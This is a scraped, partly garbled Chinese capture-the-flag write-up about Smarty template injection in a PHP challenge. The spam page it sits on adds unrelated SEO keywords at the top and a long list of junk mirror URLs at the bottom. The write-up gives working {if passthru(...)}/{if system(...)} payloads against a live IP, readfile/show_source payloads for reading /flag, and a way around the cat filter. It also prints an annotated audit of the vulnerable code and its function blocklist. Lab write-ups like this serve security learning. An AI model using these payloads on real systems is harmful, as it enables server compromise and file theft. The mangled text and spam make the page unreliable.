浦口区网站建设技术指导,成都住建局官网投诉,建筑论坛网,济南做网站最好的单位pass a parameter and maybe the flag files filename is random : 传递一个参数#xff0c;可能标记文件的文件名是随机的: 于是传一下参#xff0c;在原网页后面加上/?a1,发现网页出现了变化 3.传入参数#xff0c;一般情况下是文件包含#xff0c;或者命令执行s filename is random : 传递一个参数可能标记文件的文件名是随机的: 于是传一下参在原网页后面加上/?a1,发现网页出现了变化 3.传入参数一般情况下是文件包含或者命令执行而这道题目比较新颖使用的是php模板注入 4.根据测试2*48,确定是smarty模板注入
测试phpinfo()函数
http://114.67.246.176:18387/?a{if phpinfo()}{/if} 5.真的是百密一疏过滤了好多的函数好在没有把passthru()函数过滤
http://114.67.246.176:18387/?a{if passthru(ls /)}{/if} 6.没有发现flag但是发现_12016文件直接读一波cat被过滤了我是用的是more
http://114.67.246.176:18387/?a{if passthru(more /_12016 )}{/if} 得到flag
二、知识点
1. 常用payload smary中的{if}标签中可以执行的php语句
{if phpinfo()}{/if}
{if system(ls)}{/if}
{if readfile(/flag)}{/if}
{if show_source(/flag)}{/if}
{if system(cat ../../../../flag)}{/if}2.passthru()函数 (PHP 4, PHP 5, PHP 7, PHP 8)passthru — 执行外部程序并且显示原始输出
语法: passthru(string $command, int $return_var ?): void 同 exec() 函数类似 passthru() 函数 也是用来执行外部命令command的。 当所执行的 Unix 命令输出二进制数据 并且需要直接传送到浏览器的时候 需要用此函数来替代 exec() 或 system() 函数。 常用来执行诸如 pbmplus 之类的可以直接输出图像流的命令。 通过设置 Content-type 为 image/gif 然后调用 pbmplus 程序输出 gif 文件 就可以从 PHP 脚本中直接输出图像到浏览器。
3.cat绕过 可以使用其他函数如less、more、tac
4.system|readfile|gz|exec|eval|cat|assert|file|fgets system: PHP中的system函数用于执行命令行命令并可返回命令的输出。如果允许用户输入传递给system可能会允许攻击者执行任意命令。 readfile: readfile函数用于输出一个文件的内容。如果用户可以控制该函数的参数他们可能会读取服务器上的敏感文件。 gz: 这可能指的是与gz相关的函数如gzopen、gzread等用于处理GZIP压缩文件。如果不当使用可能会引发安全问题。 exec: 类似于systemexec函数用于执行外部程序并且可以提供更多的输出控制。这同样可以被用来执行恶意命令。 eval: eval函数执行字符串作为PHP代码。这是极其危险的因为它允许执行任意PHP代码。 cat: 在Unix/Linux系统中cat命令用于连接文件并打印到标准输出设备。在PHP中没有内置的cat函数但攻击者可能会尝试利用它来读取文件。 assert: PHP中的assert函数用于评估一个表达式并在表达式结果为FALSE时终止脚本执行。然而如果assert被用来执行外部代码它可能会成为一个安全漏洞。 file: 可能指的是file_get_contents函数它用于读取文件或URL内容。如果用户可以控制这个函数的参数他们可能会读取服务器上的敏感文件。 fgets: fgets函数用于从文件指针中读取一行。如果用户可以控制文件指针的来源他们可能会读取未授权的内容。
代码审计
pass a parameter and maybe the flag files filename is random : ?php
include(./libs/Smarty.class.php); #文件包含
echo pass a parameter and maybe the flag files filename is random :; #无需审计
$smarty new Smarty(); #smarty引入实例化 Smarty 模板引擎的一个新对象
if($_GET){highlight_file(index.php); #高亮文字foreach ($_GET AS $key $value) #foreach方法将get的值传给value
#foreachPHP中的一个循环控制结构用于遍历数组中的每个元素。
#$_GET一个超全局数组包含了所有通过GET请求方法即在URL中附加的参数传递给当前脚本的参数。
#AS关键字用于在foreach循环中指定数组元素的键$key和值$value。
#$key循环中数组元素的键参数名。
#$value循环中数组元素的值参数值{print $key.\n;if(preg_match(/flag|\/flag/i, $value)){ #对value的值进行正则匹配$smarty-display(./template.html);# $smarty这是之前通过 new Smarty(); 创建的 Smarty 对象的实例。
# -在 PHP 中这个符号用来调用对象的方法或访问对象的属性。
# display这是 Smarty 对象的一个方法用于将指定的模板文件呈现渲染为输出。
# ./template.html这是传递给 display 方法的参数指定了模板文件的路径。这里的 ./ 表示当前目录template.html 是模板文件的名称。}elseif(preg_match(/system|readfile|gz|exec|eval|cat|assert|file|fgets/i, $value)){ #对value的值进行正则匹配$smarty-display(./template.html); }else{$smarty-display(eval:.$value);}}
}
? 原文链接https://blog.csdn.net/m_de_g/article/details/120380488
https://baijiahao.baidu.com/s?id1698341051395357077wfrspiderforpc
文章转载自: http://www.morning.rnqbn.cn.gov.cn.rnqbn.cn http://www.morning.xlndf.cn.gov.cn.xlndf.cn http://www.morning.xdhcr.cn.gov.cn.xdhcr.cn http://www.morning.tyjnr.cn.gov.cn.tyjnr.cn http://www.morning.sxhdzyw.com.gov.cn.sxhdzyw.com http://www.morning.srbfz.cn.gov.cn.srbfz.cn http://www.morning.gtxrw.cn.gov.cn.gtxrw.cn http://www.morning.qsctt.cn.gov.cn.qsctt.cn http://www.morning.gthc.cn.gov.cn.gthc.cn http://www.morning.qfcnp.cn.gov.cn.qfcnp.cn http://www.morning.xyhql.cn.gov.cn.xyhql.cn http://www.morning.fhsgw.cn.gov.cn.fhsgw.cn http://www.morning.ndyrb.com.gov.cn.ndyrb.com http://www.morning.fpbj.cn.gov.cn.fpbj.cn http://www.morning.yjfmj.cn.gov.cn.yjfmj.cn http://www.morning.wqbzt.cn.gov.cn.wqbzt.cn http://www.morning.srbfz.cn.gov.cn.srbfz.cn http://www.morning.xbhpm.cn.gov.cn.xbhpm.cn http://www.morning.vibwp.cn.gov.cn.vibwp.cn http://www.morning.kwfnt.cn.gov.cn.kwfnt.cn http://www.morning.gmztd.cn.gov.cn.gmztd.cn http://www.morning.trrrm.cn.gov.cn.trrrm.cn http://www.morning.glcgy.cn.gov.cn.glcgy.cn http://www.morning.pqnps.cn.gov.cn.pqnps.cn http://www.morning.taojava.cn.gov.cn.taojava.cn http://www.morning.tongweishi.cn.gov.cn.tongweishi.cn http://www.morning.bpcf.cn.gov.cn.bpcf.cn http://www.morning.cwgt.cn.gov.cn.cwgt.cn http://www.morning.rykx.cn.gov.cn.rykx.cn http://www.morning.qtyfb.cn.gov.cn.qtyfb.cn http://www.morning.gzzncl.cn.gov.cn.gzzncl.cn http://www.morning.lmrjn.cn.gov.cn.lmrjn.cn http://www.morning.dwmmf.cn.gov.cn.dwmmf.cn http://www.morning.zxcny.cn.gov.cn.zxcny.cn http://www.morning.zrdhd.cn.gov.cn.zrdhd.cn http://www.morning.xmtzk.cn.gov.cn.xmtzk.cn http://www.morning.smfbw.cn.gov.cn.smfbw.cn http://www.morning.rwfp.cn.gov.cn.rwfp.cn http://www.morning.wsjnr.cn.gov.cn.wsjnr.cn http://www.morning.benqc.com.gov.cn.benqc.com http://www.morning.rykmz.cn.gov.cn.rykmz.cn http://www.morning.ywqsk.cn.gov.cn.ywqsk.cn http://www.morning.bsplf.cn.gov.cn.bsplf.cn http://www.morning.rfmzs.cn.gov.cn.rfmzs.cn http://www.morning.kbdrq.cn.gov.cn.kbdrq.cn http://www.morning.cfnht.cn.gov.cn.cfnht.cn http://www.morning.cfnsn.cn.gov.cn.cfnsn.cn http://www.morning.xrwsg.cn.gov.cn.xrwsg.cn http://www.morning.kggxj.cn.gov.cn.kggxj.cn http://www.morning.gwtgt.cn.gov.cn.gwtgt.cn http://www.morning.blxor.com.gov.cn.blxor.com http://www.morning.qjzgj.cn.gov.cn.qjzgj.cn http://www.morning.gcqdp.cn.gov.cn.gcqdp.cn http://www.morning.znknj.cn.gov.cn.znknj.cn http://www.morning.fnxzk.cn.gov.cn.fnxzk.cn http://www.morning.nqlkb.cn.gov.cn.nqlkb.cn http://www.morning.junyaod.com.gov.cn.junyaod.com http://www.morning.ppzgr.cn.gov.cn.ppzgr.cn http://www.morning.mqtzd.cn.gov.cn.mqtzd.cn http://www.morning.qdxtj.cn.gov.cn.qdxtj.cn http://www.morning.xbmwm.cn.gov.cn.xbmwm.cn http://www.morning.qwbht.cn.gov.cn.qwbht.cn http://www.morning.pcxgj.cn.gov.cn.pcxgj.cn http://www.morning.qiyelm.com.gov.cn.qiyelm.com http://www.morning.zpqlf.cn.gov.cn.zpqlf.cn http://www.morning.grlth.cn.gov.cn.grlth.cn http://www.morning.qmncj.cn.gov.cn.qmncj.cn http://www.morning.nhlnh.cn.gov.cn.nhlnh.cn http://www.morning.atoinfo.com.gov.cn.atoinfo.com http://www.morning.btwlp.cn.gov.cn.btwlp.cn http://www.morning.bqwrn.cn.gov.cn.bqwrn.cn http://www.morning.dansj.com.gov.cn.dansj.com http://www.morning.dkslm.cn.gov.cn.dkslm.cn http://www.morning.hmmtx.cn.gov.cn.hmmtx.cn http://www.morning.tfei69.cn.gov.cn.tfei69.cn http://www.morning.xdpjs.cn.gov.cn.xdpjs.cn http://www.morning.bkpbm.cn.gov.cn.bkpbm.cn http://www.morning.wknbc.cn.gov.cn.wknbc.cn http://www.morning.dyxzn.cn.gov.cn.dyxzn.cn http://www.morning.kpbgvaf.cn.gov.cn.kpbgvaf.cn
